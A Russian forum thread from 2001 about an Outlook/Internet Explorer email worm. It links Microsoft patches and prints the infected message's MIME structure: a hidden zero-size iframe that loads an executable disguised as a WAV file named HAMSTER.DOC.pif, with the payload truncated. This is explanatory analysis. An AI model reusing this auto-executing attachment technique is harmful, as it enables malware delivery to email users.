Форум -- Забор

Страницы: 1 2 3

Странник Гость

Тема: ЭЭЭЭ немного общибси....   для ответа необходимо зарегистрироваться Это для русского экспулера 5.01 http://download.microsoft.com/download/ie501sp1/secpac17/5.01_SP1/WIN98/ru/q290108.exe это для аглицкого экспулера 5.01 http://download.microsoft.com/download/ie55sp1/secpac17/5.5_sp1/win98me/en-us/q290108.exe А это для русского экспулера 5.5 http://download.microsoft.com/download/ie55sp1/secpac17/5.5_SP1/WIN98Me/ru/q290108.exe А это для аглицкого экспулера 5.5 http://download.microsoft.com/download/ie501sp1/secpac17/5.01_SP1/WIN98/EN-US/q290108.exe

04.12.2001 08:53

LuckyFlea Гость	Тема: RE: RE: Это новый червяк...   для ответа необходимо зарегистрироваться С точностью наоборот
04.12.2001 10:43

Magistr AKA Завхоз Гость	Тема: И чаво...   для ответа необходимо зарегистрироваться Они кернел с рундлл-лем вылечат хотишь сказать?
04.12.2001 13:07

Magistr AKA Завхоз Гость

Тема: Смотрим тело письма...   для ответа необходимо зарегистрироваться Заголовок: From tehnomor@polarcom.ru Wed Nov 28 07:01:44 2001 Received: from gnome04.sovam.com ([194.67.1.185]) by mail1.chat.ru with esmtp (Exim 3.22 #14) id 168vup-000LsP-00 for magicschool@chat.ru; Wed, 28 Nov 2001 07:01:43 +0300 Received: from ts2-a119.Murmansk.dial.sovam.com ([194.67.28.247]:14084 "helo aol.com" ident: "NO-IDENT-SERVICE[2]" smtp-auth: <none> TLS-CIPHER: <none> TLS-PEER: <none>) by gnome04.sovam.com with SMTP id <S397120AbRK1EB3>; Wed, 28 Nov 2001 07:01:29 +0300 From: "Техномор" <_tehnomor@polarcom.ru> To: magicschool@chat.ru Subject: Re: MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 Message-Id: <20011128040130Z397120-1991+1157@gnome04.sovam.com> Date: Wed, 28 Nov 2001 07:01:29 +0300 //пошел код непосредственно письма --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable //Это отображаемый HTML-код - пустой документ со встроеным фреймом <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- //А это то, что непосредственно в этом фрейме находится: --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="HAMSTER.DOC.pif" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> TVqQAAMAAAAEAAAA//8AAL...... //Здесь идёт непосредственно исполняемый код вируса. Находится _непосредственно_ в теле письма --====_ABC1234567890DEF_==== И наплевать ему, есть у вас связь или нет... Достаточно, что-бы сообщение отобразилось на экране оутлука.. А отобразится оно в случае, если вы выделите данное сообщение что-бы удалить, например. И не важно чем.. Кнопками, правой кнопкой мышы, левой кнопкой... А маскируется в данном случае он под звуковой файл, который должен зазвучать при открытии сообщения :-))

04.12.2001 13:16

Magistr AKA Завхоз Гость	Тема: ЗЫ   для ответа необходимо зарегистрироваться А вообще лучше батом пользоваться :-))
04.12.2001 13:23

Зау Таргиски Гость	Тема: Кстати, о Бате   для ответа необходимо зарегистрироваться его можно в сети скачать или покупать надоть? Хочу поставить себе :-)
04.12.2001 14:59

Magistr AKA Завхоз Гость	Тема: Если   для ответа необходимо зарегистрироваться у тебя инет хороший, то можешь и скачать... Попробуй на http://ftpsearch.city.ru поискать по thebat например... :-)
04.12.2001 15:18

Страницы: 1 2 3